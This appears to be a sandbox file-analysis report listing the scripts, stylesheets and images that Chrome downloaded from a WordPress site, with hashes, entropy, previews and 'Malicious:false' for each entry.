                                                                                                                      Preview:#header-outer[data-lhe=animated_underline] #top nav>ul>li>a{transition:color .2s ease}.sf-menu>li>a>.sf-sub-indicator i{transition:color .2s ease}.sf-shadow .sf-shadow-off{background:none repeat scroll 0 0 transparent}#header-outer:not([data-header-resize="1"]):not([data-format=left-header]) #logo img{transition:opacity .2s ease}#header-outer[data-using-secondary="1"]:not([data-format=left-header]){transition:transform .32s ease,background-color .3s ease 0s,box-shadow .3s ease 0s,margin .25s ease}#top nav ul #nectar-user-account a span,#top nav ul #search-btn a span{-webkit-transition:color .2s ease;transition:color .2s ease}#top ul .slide-out-widget-area-toggle a i.label{-webkit-transition:color .2s ease;transition:color .2s ease}#header-outer:not(.no-transition) .nectar-menu-icon.svg-icon svg path,#slide-out-width-area .nectar-menu-icon.svg-icon svg path{transition:fill .2s ease}#header-outer header .sf-menu>li.nectar-regular-menu-item>a>.nectar-menu-icon{transition:color .2s ease}#h
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (21205), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):21205
                                                                                                                      Entropy (8bit):5.249788317174228
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:gHTLkCoiKXCBQYMwoTR+YbeAkCGMBgXdgnL/7bQJ6dHMQs++C551aPu5:g3eIMp3hGEgdgnLIJcHU++CZou5
                                                                                                                      MD5:8D0B3B2F86E0025489B660454AC76419
                                                                                                                      SHA1:9F7E9AC535F3E75ACE0015339499E286837623DD
                                                                                                                      SHA-256:FD0062DADC441AC836028282DFDA635DA47F4280756D07AB0908FAF71818E05E
                                                                                                                      SHA-512:208366D97E4146CED14923E4455CDAC9A2D862A068D850A4CB8FB7E5A06061BEA03B60005601350693529F1263E49AF9D5B5ECD7BBBF0EC5ABCE2F108DF72405
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/magnific.js?ver=7.0.1
                                                                                                                      Preview:!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(window.jQuery||window.Zepto)}(function(e){var t,n,i,o,a,r,s=function(){},l=!!window.jQuery,c=e(window),p=function(e,n){t.ev.on("mfp"+e+".mfp",n)},d=function(t,n,i,o){var a=document.createElement("div");return a.className="mfp-"+t,i&&(a.innerHTML=i),o?n&&n.appendChild(a):(a=e(a),n&&a.appendTo(n)),a},u=function(n,i){t.ev.triggerHandler("mfp"+n,i),t.st.callbacks&&(n=n.charAt(0).toLowerCase()+n.slice(1),t.st.callbacks[n]&&t.st.callbacks[n].apply(t,e.isArray(i)?i:[i]))},f=function(n){return n===r&&t.currTemplate.closeBtn||(t.currTemplate.closeBtn=e(t.st.closeMarkup.replace("%title%",t.st.tClose)),r=n),t.currTemplate.closeBtn},m=function(){e.magnificPopup.instance||((t=new s).init(),e.magnificPopup.instance=t)};s.prototype={constructor:s,init:function(){var n=navigator.appVersion;t.isIE7=-1!==n.indexOf("MSIE 7."),t.isIE8=-1!==n.indexOf("MSIE 8."),t.isLowIE=t.isIE7||t.isIE8,
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (9949), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9949
                                                                                                                      Entropy (8bit):5.050619897867685
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:c7qapDOnPQAbFLcyhFAAAZAjRqKJAyAO1yr8BYltqIaQv4CNjwmEpvhZGXCVo/m7:cCBcy0K11yM4QCNj2JMlEOPnGUL2
                                                                                                                      MD5:A238C8BDDF753460A3CF1994D9A5A84F
                                                                                                                      SHA1:43A280E1AF545B024E314EB052A49138E1B3A9DD
                                                                                                                      SHA-256:940C86FDC924957F4BBF229F8580D1390D0CF2C2C74B2678B07FAA5F64F0F92C
                                                                                                                      SHA-512:3F018145C6BEC9C12A01893711297D7DF19C9D4D452771E7438DCF70800B52623405C3225D53C475A0D38A3A6B24E02CE9CA4C2A72D9520DBC5D5B4063DE0399
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/elements/nectar-testimonial-slider.js?ver=15.0.6
                                                                                                                      Preview:!function(t){"use strict";function i(t,i,e,s){this.el=t,this.type=i,this.resizeVideoToCover=e,this.fullWidthContentColumns=s,this.flickityEl=null,this.createTestimonialControls()}i.prototype.createTestimonialControls=function(){var i,e,s,l=t("body.vc_editor").length>0?"> div":"blockquote";if("multiple_visible"!=this.type&&"multiple_visible_minimal"!=this.type)if(this.el.animate({opacity:"1"},800),this.el.find("blockquote").length>1){this.el.find(".controls, .testimonial-next-prev").remove(),this.el.append('<div class="controls"><ul></ul></div>');var n=this.el.find("blockquote").length;i=this.el;for(var a=0;a<n;a++)this.el.is('[data-style="minimal"]')?i.find(".controls ul").append("<li>"+(a+1)+"</li>"):i.find(".controls ul").append('<li><span class="pagination-switch"></span></li>');if(this.el.is('[data-style="minimal"]')){if(this.el.append('<div class="testimonial-next-prev"><a href="#" class="prev fa fa-angle-left"></a><a href="#" class="next fa fa-angle-right"></a></div>'),this.el.fi
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (9949), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9949
                                                                                                                      Entropy (8bit):5.050619897867685
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:c7qapDOnPQAbFLcyhFAAAZAjRqKJAyAO1yr8BYltqIaQv4CNjwmEpvhZGXCVo/m7:cCBcy0K11yM4QCNj2JMlEOPnGUL2
                                                                                                                      MD5:A238C8BDDF753460A3CF1994D9A5A84F
                                                                                                                      SHA1:43A280E1AF545B024E314EB052A49138E1B3A9DD
                                                                                                                      SHA-256:940C86FDC924957F4BBF229F8580D1390D0CF2C2C74B2678B07FAA5F64F0F92C
                                                                                                                      SHA-512:3F018145C6BEC9C12A01893711297D7DF19C9D4D452771E7438DCF70800B52623405C3225D53C475A0D38A3A6B24E02CE9CA4C2A72D9520DBC5D5B4063DE0399
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(t){"use strict";function i(t,i,e,s){this.el=t,this.type=i,this.resizeVideoToCover=e,this.fullWidthContentColumns=s,this.flickityEl=null,this.createTestimonialControls()}i.prototype.createTestimonialControls=function(){var i,e,s,l=t("body.vc_editor").length>0?"> div":"blockquote";if("multiple_visible"!=this.type&&"multiple_visible_minimal"!=this.type)if(this.el.animate({opacity:"1"},800),this.el.find("blockquote").length>1){this.el.find(".controls, .testimonial-next-prev").remove(),this.el.append('<div class="controls"><ul></ul></div>');var n=this.el.find("blockquote").length;i=this.el;for(var a=0;a<n;a++)this.el.is('[data-style="minimal"]')?i.find(".controls ul").append("<li>"+(a+1)+"</li>"):i.find(".controls ul").append('<li><span class="pagination-switch"></span></li>');if(this.el.is('[data-style="minimal"]')){if(this.el.append('<div class="testimonial-next-prev"><a href="#" class="prev fa fa-angle-left"></a><a href="#" class="next fa fa-angle-right"></a></div>'),this.el.fi
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3620
                                                                                                                      Entropy (8bit):6.867828878374734
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                      MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                      SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                      SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                      SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                      Malicious:false
                                                                                                                      Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65247)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69917
                                                                                                                      Entropy (8bit):5.290926894311774
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:hLiMgk2gULYoXUmZx6+VWNL0kC8W90qU9JR7hDqEDqWSNB1gZFy/HG+FP:I8w0qU9JTtH3aP
                                                                                                                      MD5:99B0A83CF1B0B1E2CB16041520E87641
                                                                                                                      SHA1:BC5836992C0B260496BA520FE1336D499BF06EB7
                                                                                                                      SHA-256:DDE76B9B2B90D30EB97FC81F06CAA8C338C97B688CEA7D2729C88F529F32FBB1
                                                                                                                      SHA-512:33EA8C2353C745C61C3A927378995A59B555C76249C8F23065AB3CA2BEDD73DECB64EA248EF6E97D1C729A156D9492F28E2177C06CABD0524E0380CB38D2D52F
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,u=n.push,s=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,d=f.toString,p=d.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},v=function e(t){return null!=t&&t===t.window},y={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in y)n[i]&&(o[i]=n[i]);t.head.a
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):358947
                                                                                                                      Entropy (8bit):5.172176872916235
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:KAoeSoyha9SIYc3VePCpG63qOtb1ZiQKFFrJyrcqN0bMjvwuDY6nFhEe0BJc9Am9:KdcyCTY0ePCpG6eFl1bMjbD/H
                                                                                                                      MD5:675452316B74ED3DD0D402E7CA1682C0
                                                                                                                      SHA1:2C167BF03AB1E96DE081A508BD6B5BC1B1507E63
                                                                                                                      SHA-256:869D0CDF33E9BF56933B4F44CAF83DD0AF39BD0D03813F0508EF7EBFD3094610
                                                                                                                      SHA-512:3DEF6031A4C2629E9D6C6238B7D4F6B4792C9669952B398E991108BB614B2C6A72B66FEA9D72B72714DD3FD9E3ADEAD55F4B566F586D9C1A075C643B44A98A58
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/init.js?ver=15.0.6
                                                                                                                      Preview:!function(t,e,a){"use strict";var n,i,s=t(e),r=t("body"),o=t("#slide-out-widget-area"),l=t("#slide-out-widget-area-bg"),d=t("#header-outer"),c=t("#header-secondary-outer"),h=t("#header-outer #search-btn a"),u=t("#wpadminbar"),p=t("#ajax-loading-screen"),f=t(".body-border-top"),g=t("#page-header-bg"),m=t("#footer-outer"),v=t(".body-border-right").length>0?t(".body-border-right").width():0,b=d.is("[data-logo-height]")?parseInt(d.attr("data-logo-height")):30,w=d.is("[data-padding]")?parseInt(d.attr("data-padding")):28,y=d.is("[data-shrink-num]")?d.attr("data-shrink-num"):6,_=!!d.is('[data-condense="true"]'),C=!!d.is('[data-using-logo="1"]'),x=!!d.is('[data-header-resize="1"]'),k=!!d.is('[data-transparent-header="true"]'),$=(d.is('[data-mobile-fixed="1"]'),r.is("[data-header-format]")?r.attr("data-header-format"):"default"),T=r.is("[data-hhun]")?r.attr("data-hhun"):"",I=r.is("[data-cae]")&&"swing"!==r.attr("data-cae")?r.attr("data-cae"):"easeOutCubic",E=r.is("[data-cad]")?r.attr("data-cad"
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10417
                                                                                                                      Entropy (8bit):7.70757597380674
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:4utmkHKdhuiNuGn6Y6Z4jRI4O9jZKWLzLjg+yyS3fVyj24QAX:HKvunGn6n4FIt9jZKWHLjEJf8y4Qw
                                                                                                                      MD5:98F9FA0C28DDB741258F858D3B9D2C3A
                                                                                                                      SHA1:877FEA4CF0A7CC4A467EA392937CFD6CCFAC9E2E
                                                                                                                      SHA-256:BADC4C4BA4C30C01421A1424D64E0FEC17E5362B28C185164CDDA5431473F42E
                                                                                                                      SHA-512:2587AE8B4D630164D468B5020307722B6471CE57D6B38C670CDBA70FC22995EE419806CFAD127207A19292A7794D0DEB9BCCE58DD618D02912841C6F69C84BD8
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................2......(.............................................................................................................................................J.J..........................................................................................!1. 0@.P.2.`A"B%534D.......................!.21.".3AQa..0@..B#.q.....r$ .Rbs4t..................... 0.!Q@..1.....................!1.AQaq... 0@.....`P.................................................................................................................................................................................................................................i.V{....7....j..U.:.H..5..w..]~|.........Y...Vn..)...b...w./'=.M.mkn. *......W........../...NoE..z...... ..q&.c\...x>.............._...^j.@C5C=..\l..4Z.I5.]y..z..o.\.......>................iN.k/;=.Q..j.B.zV.:o........=?.|z....'..x..~..7.-.....0y.~.y.O=+.*M.s.@....5.5...X.}......'?f.....}.........@
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (11126)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11224
                                                                                                                      Entropy (8bit):5.2603128465032745
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                                                                                      MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                                                                                      SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                                                                                      SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                                                                                      SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (6991)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7204
                                                                                                                      Entropy (8bit):5.148893930855167
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:w1Nqg5hvdVEKI0UEmXXYytmh7f0GpJYhMpCUC6YM:wzxdO9nOdC4YM
                                                                                                                      MD5:E54552107EF011915A2A08059E545DF8
                                                                                                                      SHA1:895A82347B10AC399BD241EF7489AF9E2435729D
                                                                                                                      SHA-256:503C6E88383027044029995F4DCF604D0BA35B9EF9482D36FB3582CCA2CE0B8B
                                                                                                                      SHA-512:5EA359ABDC52046A0A3E75A376FA6A0DD19C08228667947C52BDA08D3A214EECCECCB25D227C29A16664F538401F14A7B28D168409526F22331427753DFBB187
                                                                                                                      Malicious:false
                                                                                                                      Preview:/**. * Copyright 2016 Google Inc. All Rights Reserved.. *. * Licensed under the W3C SOFTWARE AND DOCUMENT NOTICE AND LICENSE.. *. * https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document. *. */.!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersecting"in window.IntersectionObserverEntry.prototype||Object.defineProperty(window.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}});else{var t=window.document,e=[];o.prototype.THROTTLE_TIMEOUT=100,o.prototype.POLL_INTERVAL=null,o.prototype.USE_MUTATION_OBSERVER=!0,o.prototype.observe=function(t){if(!this._observationTargets.some(function(e){return e.element==t})){if(!t||1!=t.nodeType)throw new Error("target must be an Element");this._registerInstance(),this._observationTargets.push({element:t,entry:null}),this._monitorIntersec
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (5692), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):5692
                                                                                                                      Entropy (8bit):5.030640807030057
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:PQlNKX1zRos8L1M8EZI8Y2VWSfxUeNBhQ4lMq3Yd2HD:PFusSOu8YxuDh1L
                                                                                                                      MD5:BECA72584B7B6DF68F09CD56ACD813CC
                                                                                                                      SHA1:C3788C2E7BCFBDB9067FB5579E9CF323609A2187
                                                                                                                      SHA-256:E40C49D2D7CFC035902C7B8471E9736B9A05B2ADC59ED919567063676D3B793E
                                                                                                                      SHA-512:1667BB61B00AF922A31E247B96CA2641FABA9500020BF27F957CAF91F87F582D832B6DC3B4C885E5031416C871B8F803CD13D670614AE5A76B351786BAB71B6A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/superfish.js?ver=1.5.8
                                                                                                                      Preview:!function(e){"use strict";e(window).on("resize",function(){e(".sf-menu ul.tracked-pos").removeClass("tracked-pos")});var t,s,n,a,r,o,i,h,l,d,p,u,f,c,m,v,g=(s="sf-breadcrumb",n="sf-js-enabled",a="sf-with-ul",r="sf-arrows",o=function(){var t=/iPhone|iPad|iPod/i.test(navigator.userAgent);return t&&e("html").css("cursor","pointer").on("click",e.noop),t}(),i="behavior"in(t=document.documentElement.style)&&"fill"in t&&/iemobile/i.test(navigator.userAgent),h=function(e,t){var s=n;t.cssArrows&&(s+=" "+r),e.toggleClass(s)},l=function(e){e.children("a").toggleClass(a)},d=function(e){var t=e.css("ms-touch-action");t="pan-y"===t?"auto":"pan-y",e.css("ms-touch-action",t)},p=function(t){var s=e(this),n=s.siblings(t.data.popUpSelector);n.length>0&&n.is(":hidden")&&(s.one("click.superfish",!1),"MSPointerDown"===t.type?s.trigger("focus"):e.proxy(u,s.parent("li"))())},u=function(){var t=e(this),s=v(t);e(this).parents(".megamenu").length>0||(clearTimeout(s.sfTimer),t.siblings().superfish("hide").end().su
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):16
                                                                                                                      Entropy (8bit):3.875
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:HTL:zL
                                                                                                                      MD5:C78FC4C73991971736F95F00B7C09E4F
                                                                                                                      SHA1:2BFE006346297E446B58308E3F37169A4BC29046
                                                                                                                      SHA-256:C70E533105E5FE64092A52295354E975F8D6DDF470DA3F7AE4A6D4F3FC915283
                                                                                                                      SHA-512:5F85D1EA2C4DB38DF3A6FC5414C03EDA186CF86A84F9D0E4C37053791060936B486A0493B54010319FCBA943ED4E95F58045C3EDD135952E69CED9EE87BD21F0
                                                                                                                      Malicious:false
                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlk8QRj2Jvy5BIFDbtXVmo=?alt=proto
                                                                                                                      Preview:CgkKBw27V1ZqGgA=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6730
                                                                                                                      Entropy (8bit):7.404181296915908
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:G/wFLp9KY8V0REZhp3Qh/mpMkc8IVE+3K/lt/XLffJCzYDfboCiLW+/ePsl:Gw1PKY8Vt8MMkctExDlDzyNGUl
                                                                                                                      MD5:D368BB45BB15EE6D3DC28A21B81131AE
                                                                                                                      SHA1:33CAF014F939FFB0E792188F68D9B89DD3B30146
                                                                                                                      SHA-256:0BE69D1BF505AAFAEF113047457705E10FE10CC387E5A7286EB401D5F68091F0
                                                                                                                      SHA-512:859B573FCCA1603D25A03D3EDBB8C6B6CD0F08331E7ADC2826DEF7EE842EDB10169691122941972B7C8FBD5074124DC347D27CAED460EEF90DE97B9C5A713A46
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d............................H............................................................................................................................................J.J........................................................................................P.@!1.#."2.45. .........................!1AQaqR.@P...."2B.# ..3.....b.s.r.t......................................!1Q.Aaq.P.@... ...`...............@.......................................................................................................................................................................................i..z.%k.Jv..............r...XZS.y..z...............\..h...%.../c$.........h...4K..`.T....hk.0%.Z..d.........E.Q.VMP.. jFeE5.......&.].fk.........k+.GQ..3".N##.:J...7htY..Z............G..D.&yI..'O...y.\.GO~.mU.LM.>......... .s".H.zq..S".v...?....It..............p..sqU!.3...r*}.y..u....;R\..........|<..u..D........................(.D.r...U..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):217
                                                                                                                      Entropy (8bit):5.1508709451178865
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:UhC6j/7NKZTRYrtH3ERAT8wEggqgq/wl/q:Uz77NdG4Cqcl/q
                                                                                                                      MD5:95E891F28E44A9B314C09545D86BE2B7
                                                                                                                      SHA1:F9B13A8BD47273B086A0A07DF15F314E0AF0BC3E
                                                                                                                      SHA-256:5A5F39391FBF5B06DB84B8F9716D53DE575EE97A627D2C5F12F79A991A671EB5
                                                                                                                      SHA-512:105947A192EC19166AB0D106A357BAC3C4DF7FCF575E4BEFA3002F0F032F80056CABF3AF085DE1F27B177243F7053D624059C7389E90259B9A62D745CBC19289
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-includes/css/classic-themes.min.css?ver=1
                                                                                                                      Preview:/*! This file is auto-generated */..wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9533
                                                                                                                      Entropy (8bit):7.630656000633704
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:2ulQlQfLOhOzx9OfYTf5GAvdqweZGHmXuJwC9ceEvfo1SZe5MtTbtpW:jQlWL/7zFGen4GGIhYfC5wbrW
                                                                                                                      MD5:E0B2CD949B5AEE0B92C2DF61016729DB
                                                                                                                      SHA1:C561BD4E2040A3FFEEC54F5DD7768ED325BF1612
                                                                                                                      SHA-256:09E1B5006504EAAB7D397117F9D385124035697051B11577B0EB48883B14C1F1
                                                                                                                      SHA-512:73CE7A46A13289147920230716E4A833E62F41679D238B432B58E5D4FA256B7A7C59396FED9EBC4C0283F9B2381213C2177D525E0A3C469405310198F212C940
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d...........................%;............................................................................................................................................J.J........................................................................................1.!2.4. 0.@.".#3$B5.......................!1AQ...0aq.."r#s....2..3 .R.....Bb.Sc.$4.....................@! 0P.1.`aAQ.....................!1A.Qaq0..... ....@...........................................................................................................................................................................................................................................................................................E...:||...\*...z`...+4..6.....R....Fs.!w.........o...XHF}......(..{....V...j.S.O.6..".i.Lj....y...........3...jT.8....N.>k......~6.75..i.....~....c........c.g.;..F.<....<+.....z.V...../9>.3..o??0...S.....f.5....l[+[.pe9.f.=*.Pr...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2320)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2392
                                                                                                                      Entropy (8bit):5.115603596289524
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:qua9/SHQZqr5hp4RB667CGA9Ah8KG98sbfEPEUGrUZzrUJoDrFquYyYWjYPIIbFl:1g/urbY6GijazArEcP7uMVwI1ebYR9
                                                                                                                      MD5:56BA0CDB72B1B00226A21FE08251054A
                                                                                                                      SHA1:82BEF20F71EB674C7D1D63242C80AFBC1E6D8274
                                                                                                                      SHA-256:15A71D32B340BF3641581AC5B4F37887B9CB3981477D5886EC5849749C8A36E7
                                                                                                                      SHA-512:6F33BBC08A61FF3FBFD3533F16355F7C804F2C151496DA3FF0BC14939E7BAA44CA7DA56BC93FB555AFD59E1ACE12BEB8DECCF3E3FA208AE66D66B8D4F40BA718
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*.* jQuery Easing v1.4.1 - http://gsgd.co.uk/sandbox/jquery/easing/.*/.!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?module.exports=n(require("jquery")):n(jQuery)}(function(n){function e(n){var e=7.5625,t=2.75;return n<1/t?e*n*n:n<2/t?e*(n-=1.5/t)*n+.75:n<2.5/t?e*(n-=2.25/t)*n+.9375:e*(n-=2.625/t)*n+.984375}void 0!==n.easing&&(n.easing.jswing=n.easing.swing);var t=Math.pow,u=Math.sqrt,r=Math.sin,i=Math.cos,a=Math.PI,o=1.70158,c=1.525*o,s=2*a/3,f=2*a/4.5;return n.extend(n.easing,{def:"easeOutQuad",swing:function(e){return n.easing[n.easing.def](e)},easeInQuad:function(n){return n*n},easeOutQuad:function(n){return 1-(1-n)*(1-n)},easeInOutQuad:function(n){return n<.5?2*n*n:1-t(-2*n+2,2)/2},easeInCubic:function(n){return n*n*n},easeOutCubic:function(n){return 1-t(1-n,3)},easeInOutCubic:function(n){return n<.5?4*n*n*n:1-t(-2*n+2,3)/2},easeInQuart:function(n){return n*n*n*n},easeOutQuar
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):358947
                                                                                                                      Entropy (8bit):5.172176872916235
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:KAoeSoyha9SIYc3VePCpG63qOtb1ZiQKFFrJyrcqN0bMjvwuDY6nFhEe0BJc9Am9:KdcyCTY0ePCpG6eFl1bMjbD/H
                                                                                                                      MD5:675452316B74ED3DD0D402E7CA1682C0
                                                                                                                      SHA1:2C167BF03AB1E96DE081A508BD6B5BC1B1507E63
                                                                                                                      SHA-256:869D0CDF33E9BF56933B4F44CAF83DD0AF39BD0D03813F0508EF7EBFD3094610
                                                                                                                      SHA-512:3DEF6031A4C2629E9D6C6238B7D4F6B4792C9669952B398E991108BB614B2C6A72B66FEA9D72B72714DD3FD9E3ADEAD55F4B566F586D9C1A075C643B44A98A58
                                                                                                                      Malicious:false
